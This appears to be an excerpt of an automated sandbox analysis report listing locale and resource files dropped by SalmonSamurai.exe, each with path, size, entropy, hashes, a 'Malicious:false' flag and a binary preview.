                                                                                                                                                                                                                                          SHA-512:1476963F47B45D2D26536706B7EEBA34CFAE124A3087F7727C4EFE0F19610F94393012CDA462060B1A654827E41F463D7226AFA977654DCD85B27B7F8D1528EB
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........U...h.....i. ...j.,...k.;...l.F...n.N...o.S...p.`...r.f...s.w...t.....v.....w.....y.....z.....|.....}.........................................................................A.....U.....].....o.....z.....................................................9.....R.....q.....w...............................................!.....0.....6.....>.....N....._.....s.....................................................$.....:.....L.....h.......................................................................".....=.....|...............................................*.....9.....a.....d.....v...................................................................................d.......................t.........................................%.....0.....9.....P.....x.............................U.....r.....z........................... .....".....%.....(.....*.6...+.9...,.W.....h.../.....0.....1.....3.....4.....5.....6.D...7.Y...8.p...9.....;.....<.....=.....>.....?.....@.....A.(...C.I...D.T...E.t.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\sl.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):427791
                                                                                                                                                                                                                                          Entropy (8bit):5.48540289392965
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:iyCeC3SMQRB21BPDwY5oEcAVOlJgi/fzxzqg:iTJ6kDwY5oEc0i/fzxt
                                                                                                                                                                                                                                          MD5:D4BD9F20FD29519D6B017067E659442C
                                                                                                                                                                                                                                          SHA1:782283B65102DE4A0A61B901DEA4E52AB6998F22
                                                                                                                                                                                                                                          SHA-256:F33AFA6B8DF235B09B84377FC3C90403C159C87EDD8CD8004B7F6EDD65C85CE6
                                                                                                                                                                                                                                          SHA-512:ADF8D8EC17E8B05771F47B19E8027F88237AD61BCA42995F424C1F5BD6EFA92B23C69D363264714C1550B9CD0D03F66A7CFB792C3FBF9D5C173175B0A8C039DC
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........A...h.....i.....j.....k.....l.....n.!...o.&...p.3...r.9...s.J...t.S...v.h...w.u...y.{...z.....|.....}.....................................................................................*.....:.....B.....R.....y...............................................,.....D.....N.....X.....b.....m.....{.................................................................M.....c.....h.....o...........................................................%.....C.....d.................................................................3.....=.....L.....c.....v.....................................................-.....@.....P.....e.....|.................................................................Y.............................2.....m.....z.....................................................2.....H.....o............................................. .....".....%.....(.P...*.t...+.w...,.........../.....0.....1.....3. ...4.<...5.Q...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.,...A.....C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\sr.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):660194
                                                                                                                                                                                                                                          Entropy (8bit):4.761695251077794
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:oLNvoUKEuNI0I4Ki1eg82ATs+Hc549x4moW037LJzk/k/N:xrnqJc5Axjw
                                                                                                                                                                                                                                          MD5:CBB817A58999D754F99582B72E1AE491
                                                                                                                                                                                                                                          SHA1:6EC3FD06DEE0B1FE5002CB0A4FE8EC533A51F9FD
                                                                                                                                                                                                                                          SHA-256:4BD7E466CB5F5B0A451E1192AA1ABAAF9526855A86D655F94C9CE2183EC80C25
                                                                                                                                                                                                                                          SHA-512:EFEF29CEDB7B08D37F9DF1705D36613F423E994A041B137D5C94D2555319FFB068BB311884C9D4269B0066746DACD508A7D01DF40A8561590461D5F02CB52F8B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........e...h.,...i.=...j.I...k.X...l.c...n.k...o.p...p.}...r.....s.....t.....v.....w.....y.....z.....|.....}.................................................&.....'.....(.....*.....y............................. .....b.........................................?.....c.........................................?.....V.....o...................................3.....R...................................'.....1.....A.....M.....l.............................J.....................................................4.....@.....c.............................-.....l...................................P.....S.....n.....................................................%.....1.....J.....Y.....o.......................).................&.....n...............................................g.......................H...................................0.....E... .Y...".....%.....(.....*.....+."...,.@.....h.../.....0.....1.....3.....4.R...5.....6.....7.....8.B...9.v...;.....<.....=.....>.....?.....@.....A.....C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\sv.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):385361
                                                                                                                                                                                                                                          Entropy (8bit):5.543491670458518
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:M4pITVzssdlJ9EAjiws8cB7xjpZ/4LLXru9M9SOxDE/xUDvZv5pB5mEgb7:BpIXzJ9V2B1q5/5mz
                                                                                                                                                                                                                                          MD5:502E4A8B3301253ABE27C4FD790FBE90
                                                                                                                                                                                                                                          SHA1:17ABCD7A84DA5F01D12697E0DFFC753FFB49991A
                                                                                                                                                                                                                                          SHA-256:7D72E3ADB35E13EC90F2F4271AD2A9B817A2734DA423D972517F3CFF299165FD
                                                                                                                                                                                                                                          SHA-512:BD270ABAF9344C96B0F63FC8CEC04F0D0AC9FC343AB5A80F5B47E4B13B8B1C0C4B68F19550573A1D965BB18A27EDF29F5DD592944D754B80EA9684DBCEDEA822
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........0...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.*...t.3...v.H...w.U...y.[...z.j...|.p...}...........................................................................................!.....).....2.....M.....U.....`...........................................................&.....-.....:.....c.....t.........................................................../.....;.....C.....U.....e.....i.....s.....z...................................%.....H.....S.....Y.....a.....h.....n.....{.....................................................).....R.....q.....y.................................................................$.....+.........../.....7.....?.....J.....R.....].................".....).....u.................................................................'.....?.....k...............................................".....*... ./...".9...%.[...(.x...*.....+.....,.........../.....0.....1.....3.)...4.P...5.e...6.....7.....8.....9.....;.....<.....=.....>.....?.....@.%...A.Q...C.p.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\sw.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):404460
                                                                                                                                                                                                                                          Entropy (8bit):5.342349721117576
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:icM47G565vqimUwbQuBndO8gJGgnATm5A1vZcsToe4t2ht:iy7GsP5Ar
                                                                                                                                                                                                                                          MD5:39277AE2D91FDC1BD38BEA892B388485
                                                                                                                                                                                                                                          SHA1:FF787FB0156C40478D778B2A6856AD7B469BD7CB
                                                                                                                                                                                                                                          SHA-256:6D6D095A1B39C38C273BE35CD09EB1914BD3A53F05180A3B3EB41A81AE31D5D3
                                                                                                                                                                                                                                          SHA-512:BE2D8FBEDAA957F0C0823E7BEB80DE570EDD0B8E7599CF8F2991DC671BDCBBBE618C15B36705D83BE7B6E9A0D32EC00F519FC8543B548422CA8DCF07C0548AB4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........Y...h.....i.....j.+...k.:...l.E...n.M...o.R...p._...r.e...s.v...t.....v.....w.....y.....z.....|.....}.........................................................................3.....E.....U.....i.....u...........................................................+.....H.....N.....Z.....m.....z.....................................................$.....8.....E.....p.......................................................................8.....W.....{................................................................. .....[.....m.....{...................................(.....4.....K.....x.....{.........................................................................................+.....\...................................+.....P.....Z.....r.....x...............................................-.....L............................................. .....".....%.....(.7...*.S...+.V...,.t........./.....0.....1.....3.....4.....5.1...6.i...7.....8.....9.....;.....<.....=.....>.....?.....@.....A.9.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\ta.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1043803
                                                                                                                                                                                                                                          Entropy (8bit):4.044068430611977
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:LXNxfy+orMVjLn1ExBlhfg5yzntRMcA2i:rffyrrMFL1cB3g5yzMcA2i
                                                                                                                                                                                                                                          MD5:7006691481966109CCE413F48A349FF2
                                                                                                                                                                                                                                          SHA1:6BD243D753CF66074359ABE28CFAE75BCEDD2D23
                                                                                                                                                                                                                                          SHA-256:24EA4028DA66A293A43D27102012235198F42A1E271FE568C7FD78490A3EE647
                                                                                                                                                                                                                                          SHA-512:E12C0D1792A28BF4885E77185C2A0C5386438F142275B8F77317EB8A5CEE994B3241BB264D9502D60BFBCE9CF8B3B9F605C798D67819259F501719D054083BEA
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........(...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.#...v.8...w.E...y.K...z.Z...|.`...}.r.....z.................................................................M.....{.............................v.......................n.....p.....t.................E.....c.......................;.......................0.....m...............................................$.....`...................................0.....y.................9.............................!.....(.....F.....n.......................3.............................F...........;.....`.......................7.....:.....n.................$.....Z.....................................................E.....#.......................Q.................c.............................#...../.....s.............................B.................*.....?.....d............... .....".....%.}...(.....*.O...+.R...,.p........./.....0.....1.u...3.....4.....5.....6.....7.]...8.....9.....;.'...<.G...=.j...>.....?.....@.....A.9...C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\te.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):965006
                                                                                                                                                                                                                                          Entropy (8bit):4.295544641165274
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:wM9fKUyABW3p1F9SviTlw2cfgvNFOJgr/p54JVQJMwKpaJC28+58XoX0Doq9OyUk:wM9fKU6225jM9h
                                                                                                                                                                                                                                          MD5:F809BF5184935C74C8E7086D34EA306C
                                                                                                                                                                                                                                          SHA1:709AB3DECFF033CF2FA433ECC5892A7AC2E3752E
                                                                                                                                                                                                                                          SHA-256:9BBFA7A9F2116281BF0AF1E8FFB279D1AA97AC3ED9EBC80C3ADE19E922D7E2D4
                                                                                                                                                                                                                                          SHA-512:DE4B14DD6018FDBDF5033ABDA4DA2CB9F5FCF26493788E35D88C07A538B84FDD663EE20255DFD9C1AAC201F0CCE846050D2925C55BF42D4029CB78B057930ACD
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........o...h.@...i.Z...j.f...k.u...l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.........................&...........5.....<.....C.....D.....E.....J.................5.....r.............................#.............................8.....~.......................T.....v.......................x...........#.....A.....c.......................s.......................=...................................V.................v...........>.....s.........................................h.....}.................L.....g.................n.......................:.....c.............................".....R.........................................%.....L.....s.................k...................................1.............................A.....V.....e...........".....r...........P...........>.............................U.....|... .....".....%.....(.q...*.....+.....,.........../.n...0.....1.#...3.F...4.....5.....6.O...7.....8.....9.$...;.Q...<.n...=.....>.....?.....@.....A.Z.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\th.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):811437
                                                                                                                                                                                                                                          Entropy (8bit):4.342029978594925
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:1Jf31Mkgs3s5UWgHLRflsjj8cKGXdlogG0EeuLADh7Kle9dKj753ohP09XAyFHyJ:1Qzt5/5l
                                                                                                                                                                                                                                          MD5:2C41616DFE7FCDB4913CFAFE5D097F95
                                                                                                                                                                                                                                          SHA1:CF7D9E8AD3AA47D683E47F116528C0E4A9A159B0
                                                                                                                                                                                                                                          SHA-256:F11041C48831C93AA11BBF885D330739A33A42DB211DACCF80192668E2186ED3
                                                                                                                                                                                                                                          SHA-512:97329717E11BC63456C56022A7B7F5DA730DA133E3FC7B2CC660D63A955B1A639C556B857C039A004F92E5F35BE61BF33C035155BE0A361E3CD6D87B549DF811
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..........y.h.....i.....j.....k.....l.....o.....p.....r.....s.....t.....v.....w.....y.....z.,...|.2...}.D.....L.....Q.....Y.....d.....l.....q.....y.............................................................................(.....7................................... .....Y.....k.............................=.....\.....z.............................^.................d.....................................................J.....w.......................F.....y...............................................,.....J.....t.................".....y.................E.....c...................................&.....G.....d.....................................................;...........P.................n.................j.........................................9.......................C.....{...........5.....>.....S..................... .....".....%.?...(.....*.....+.....,.........../.U...0.h...1.....3.....4.V...5.....6.)...7.J...8.....9.....;.....<.....=.....>.X...?.....@.....A.....C. ...D.<...E.o.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\tr.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):411446
                                                                                                                                                                                                                                          Entropy (8bit):5.6133974766805546
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:y1MAG26Pl1kY1bkQq/7I5NsA7WGgeh5X/0+gi1ZavXEAQwiBvVGI:9j2Yle66s5775X/R
                                                                                                                                                                                                                                          MD5:3A858619502C68D5F7DE599060F96DB9
                                                                                                                                                                                                                                          SHA1:80A66D9B5F1E04CDA19493FFC4A2F070200E0B62
                                                                                                                                                                                                                                          SHA-256:D81F28F69DA0036F9D77242B2A58B4A76F0D5C54B3E26EE96872AC54D7ABB841
                                                                                                                                                                                                                                          SHA-512:39A7EC0DFE62BCB3F69CE40100E952517B5123F70C70B77B4C9BE3D98296772F10D3083276BC43E1DB66ED4D9BFA385A458E829CA2A7D570825D7A69E8FBB5F4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........}...h.\...i.m...j.w...k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.......".....'...../.....7.....?.....F.....M.....T.....U.....V.....X...........................................................L.....f.....h.....l.....................................................:.....O.....[.....~............................................... .....$.....,.....9.....N.....P.....S.....Z.....q.....................................................!.....(...../.....D.....X.....{.........................................3.....V.....e.....q.....|.............................................................................).....2.....9.....D.....L.....[.................!.....'.....o.................................................................9.....X.........................................!.....0.....G.....M... .X...".m...%.....(.....*.....+.....,.........../.....0.%...1.Z...3.g...4.}...5.....6.....7.....8.....9.2...;.B...<.M...=.Z...>.m...?.v...@.....A.....C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\uk.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):705061
                                                                                                                                                                                                                                          Entropy (8bit):4.868598768447113
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:wrccq9nty/KiDswU1nbx05kB3IjUUmEg5KuoLNiXElqnOyh:HGX35EEK
                                                                                                                                                                                                                                          MD5:EE70E9F3557B9C8C67BFB8DFCB51384D
                                                                                                                                                                                                                                          SHA1:FC4DFC35CDE1A00F97EEFE5E0A2B9B9C0149751E
                                                                                                                                                                                                                                          SHA-256:54324671A161F6D67C790BFD29349DB2E2D21F5012DC97E891F8F5268BDF7E22
                                                                                                                                                                                                                                          SHA-512:F4E1DA71CB0485851E8EBCD5D5CF971961737AD238353453DB938B4A82A68A6BBAF3DE7553F0FF1F915A0E6640A3E54F5368D9154B0A4AD38E439F5808C05B9F
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:............h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.,...|.2...}.D.....L.....Q.....Y.....a.....i.....p.....w.....~...................................!.....K.....d.....m.............................P.....R.....V.....~...................................%.....F.........................................1.....S.....y.............................!.....8.....Q.....[.....k.....{.............................A.....n.........................................(.....H.....l.....x.......................&.....=.........................................A.....D.....i.............................'...........1.....2.....B.....T.....f.....y.............................+.................$.....~...................................$.....R.......................<.....w.............................E.....u......... .....".....%.....(.....*.{...+.~...,.........../.....0. ...1.....3.....4.....5.....6.Z...7.}...8.....9.....;.....<.....=.....>.I...?.X...@.y...A.....C.1...D.J.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\ur.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):617109
                                                                                                                                                                                                                                          Entropy (8bit):5.143761316646653
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:LbeI8PzGSEiyqkAXsA5rzTExbWW7mQYrjuUco/9NjjFpvIx:LbDwz5qWK
                                                                                                                                                                                                                                          MD5:FF0A23974AEF88AFC86ECC806DBF1D60
                                                                                                                                                                                                                                          SHA1:E7BAE97CBB8692A0D106644DFAA9B7D7EA6FCEF0
                                                                                                                                                                                                                                          SHA-256:F245AB242AAFEEF37DB736C780476534FAD0706AA66DCB8B6B8CD181B4778385
                                                                                                                                                                                                                                          SHA-512:AABE8160FAC7E0EB8E8EB80963FE995FA4A802147D1B8F605BC0FE3F8E2474463C1D313471C11C85EB5578112232FDC8E89B8A6D43DBE38A328538FF30A78D08
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:........S...h.....i.....j.....k.+...l.6...n.>...o.C...p.P...r.V...s.g...t.p...v.....w.....y.....z.....|.....}.........................................................................v...............................................!.....c...............................................3.....Z.....g.............................:.....a.....k.....~.......................+.....\.....f.....y.........................................(.....J.....x.......................7.....F.....N.....U.....i...................................P.....c.....}.................(.....X.....g...............................................!.....?.....].....~.....................................................W.................C.............................!.....=.....C.....Q.....e.....k.......................^.......................+.....7.....L.....e............... .....".....%.....(.....*.K...+.N...,.l........./.....0.....1.....3.1...4.^...5.....6.....7.....8.S...9.l...;.....<.....=.....>.....?.....@.....A.....C.W.

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\vi.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):488196
                                                                                                                                                                                                                                          Entropy (8bit):5.7988900625034185
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:gzLBn6cDgszBm0JXbwS1LcxzIJj758+UIi0+UELbzi830l:gpdDgsz00JrwSNizS5Hti0+UUvi830l
                                                                                                                                                                                                                                          MD5:3FE6F90F1F990AED508DEDA3810CE8C2
                                                                                                                                                                                                                                          SHA1:3B86F00666D55E984B4ACA1A5E8319FFA8F411FF
                                                                                                                                                                                                                                          SHA-256:5EEBB23221AEBCF0BE01BFC2695F7DD35B17F6769BE1E28E5610D35C9717854B
                                                                                                                                                                                                                                          SHA-512:9AA9D55F112C8B32AA636086CFD2161D97EA313CAC1A44101014128124A03504C992AC8EFD265ABA4E91787AEF7134A14507A600F5EC96FF82DF950A8883828C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:............h.j...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.!...}.3.....;.....@.....H.....P.....X....._.....f.....m.....n.....o.....q...............................................(.....2.....Y.....x.....z.....~................................... .....+.....D.....t...........................................................5.....L.....V.....a.....r...........................................................T.....q.................................................................o...................................<.....P.....[.....i.....|.........................................#.....:.....A.....D.....E.....N.....W.....c.....m.......................4.....C.....................................................2.....=....._.............................4.....i....................................... .....".....%.....(.E...*.j...+.m...,.........../.....0.....1.....3.....4.*...5.?...6.y...7.....8.....9.....;.....<.....=.....>.....?.'...@.I...A.u...C...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\zh-CN.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):354097
                                                                                                                                                                                                                                          Entropy (8bit):6.680890808929274
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:gchsAAfyrtJw99jEaZx79+vKK4/+kTme5zBNCJ7GAmlv:gAAfyrtJAoaZ+vKK4/ye5zBNCJ7C
                                                                                                                                                                                                                                          MD5:20F315D38E3B2EDC5832931E7770B62A
                                                                                                                                                                                                                                          SHA1:2390BD585DEC1E884873454BB98B6F1467DCF7BB
                                                                                                                                                                                                                                          SHA-256:53A803724BBF2E7F40AAB860325C348F786EECA1EA5CA39A76B4C4A616E3233F
                                                                                                                                                                                                                                          SHA-512:C338E241DE3561707C7C275B7D6E0FB16185A8CD7112057C08B74FFCE122148EF693FE310C839FF93F102726A78E61DE3E68C8E324F445A07A98EE9C4FDD4E13
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..........?.h.....i.....j.....k.&...l.-...m.5...o.;...p.@...r.F...s.W...t.`...v.u...w.....|.....}...............................................................................%.....1.....C.....I.....\.....s.....y.....................................................#...../.....G.....S....._.................................................................+.....:.....@.....I.....[.....m.....s.....y...............................................$.....0.....6.....>.....E.....Q.....].....i............................................... .....D.....b.....q.....w............................................................................. .....5.....>.....G.....M.....W.....a.............................K.....].....o.................................................................,.....>.....g............................................. .....".....%.....(.)...*.>...+.A...,.n........./.....0.....1.....3.....4.....5.....6.N...7.c...8.x...9.....;.....<.....=.....>.....?.....@.....A.P...C.w...D...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\locales\zh-TW.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):350032
                                                                                                                                                                                                                                          Entropy (8bit):6.69437398216595
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:BiwxICJkrCU2JLuRyMD+4qz5MHzCtMkZ/9ybT1:BiyS0pMD+4qz5MHzd6/o
                                                                                                                                                                                                                                          MD5:524711882CBFB5B95A63EF48F884CFF0
                                                                                                                                                                                                                                          SHA1:1078037687CFC5D038EEB8B63D295239E0EDC47A
                                                                                                                                                                                                                                          SHA-256:9E16499CD96A155D410C8DF4C812C52FF2A750F8C4DB87FD891C1E58C1428C78
                                                                                                                                                                                                                                          SHA-512:16D45A81F7F4606EDA9D12A8B1DA06E3C866B11BDC0C92A4022BFB8D02B885D8F028457CF23E3F7589DFD191ED7F7FBC68C81B6E1411834EDFCBC9CC85E0DC4D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..........\.h.....i.....j.....k.....l.....n.....o.....p.....r.....s.-...t.6...v.K...w.X...y.^...z.m...|.s...}..................................................................................... .....8.....N.....Z.....m...........................................................!.....*.....6.....S.....`.....l.....~.......................................................................#.....)...../.....5.....M.....\.....k.....}.............................................................................'.....T.....`.....l.....................................................,...../.....;.....M....._.....s.............................................................................I.....v.....|...............................................!.....'.....-.....?.....i.....................................................$.....8.....A... .M..."._...%.z...(.....*.....+.....,.........../.....0.....1.@...3.Q...4.i...5.....6.....7.....8.....9.....;.....<.....=.-...>.F...?.P...@.e...A.....C.....D...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\resources.pak

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):5245458
                                                                                                                                                                                                                                          Entropy (8bit):7.995476669559971
                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                          SSDEEP:98304:HLYxfQVcnNWz49PDq2AwpmqdhBh1Dd42cjrwrbHw4o0DPelwG3RC:H0pQGcMButuBhpd4jkrU4oeelrRC
                                                                                                                                                                                                                                          MD5:7D5065ECBA284ED704040FCA1C821922
                                                                                                                                                                                                                                          SHA1:095FCC890154A52AD1998B4B1E318F99B3E5D6B8
                                                                                                                                                                                                                                          SHA-256:A10C3D236246E001CB9D434A65FC3E8AA7ACDDDDD9608008DB5C5C73DEE0BA1F
                                                                                                                                                                                                                                          SHA-512:521B2266E3257ADAA775014F77B0D512FF91B087C2572359D68FFE633B57A423227E3D5AF8EE4494538F1D09AA45FFA1FE8E979814178512C37F7088DDD7995D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:............f.......P'....$*.....-...43@...4.H...4XK...4i]...4.f...4.m...4?p...4.v...4.x...4.z...4.~...4....4.....4?....4.....4....4.....4=....4z....4a....4....4....4.....4.....4.....43....4.....4.....4J....4J....4.....4.....4#....4j....4J....5.....5....v5.:..w5.;..x5.<..y5.>..z5a?...5.?...5.D...5.E...5dJ...5.O...5.V...5.f...5.w...5.x...5.|..n<&...x<....y<....z<....{<....|<....<+....<r....<8....</....<....V@....W@....X@x...Y@d...Z@....[@2...\@O...]@....^@...._@hh..`@....<A....=A.....P.~...Pe....PX....P.....P.....Pt....P.....P3....Q.....QF....Q.....Q.....Q.....Q[....QA....Q.....Q.....QW....Q.....Qv....Q9!...Q.'...QF....Q.1..,Q.F..-QsL...QLN../Q.P..0Q.U..1Q.i..2Q.j..3Q.k..4QEm..5Q.o..6Q.r..7Q~t..8QEw..9Q!x..:Q.z..;Ql...<Q)...=Q....>Q ...?Q"....R....Ry....}.....}. ...}._...}%a...}[h...}.h...}[j...}Lo...}....}.&...}.....}.6...}4;...}.=...}&B...}mG...~.O...~.d...~.q...~.t...~.|...~.}..!~...."~....#~...$~|...&~....'~A...(~....)~....*~t$..+~.4..,~.6..-~V8...~.;../~i<..0~|=..1~iA..2~.H

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\NsisExtracted\resources\app.asar

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8623182
                                                                                                                                                                                                                                          Entropy (8bit):5.556347118206602
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:49152:Hn9CyBK3UK9tUv3UuAdFUnBUecSHNXC4215nL2S26L82ELcAJvsvRRvy4vS716DT:HyUkmE
                                                                                                                                                                                                                                          MD5:2DB47AF7467164D1BB58AF47DC46F6CD
                                                                                                                                                                                                                                          SHA1:AA4B3F342F7DFBC01ABE53D777508C486F589446
                                                                                                                                                                                                                                          SHA-256:5FC547A0A658287F101970D3882CE47F8D35735AE0E227B507503A3D9764F358
                                                                                                                                                                                                                                          SHA-512:05B8DB2BC8C1BC6EB17A3B8EAFCA9F3F0E2DB21B79BADF520C2208D60071B081EDA96BA0285C6770E1E51E67A1E116773617B8115901E0B99BACBC9B2D96516D
                                                                                                                                                                                                                                          Malicious:false
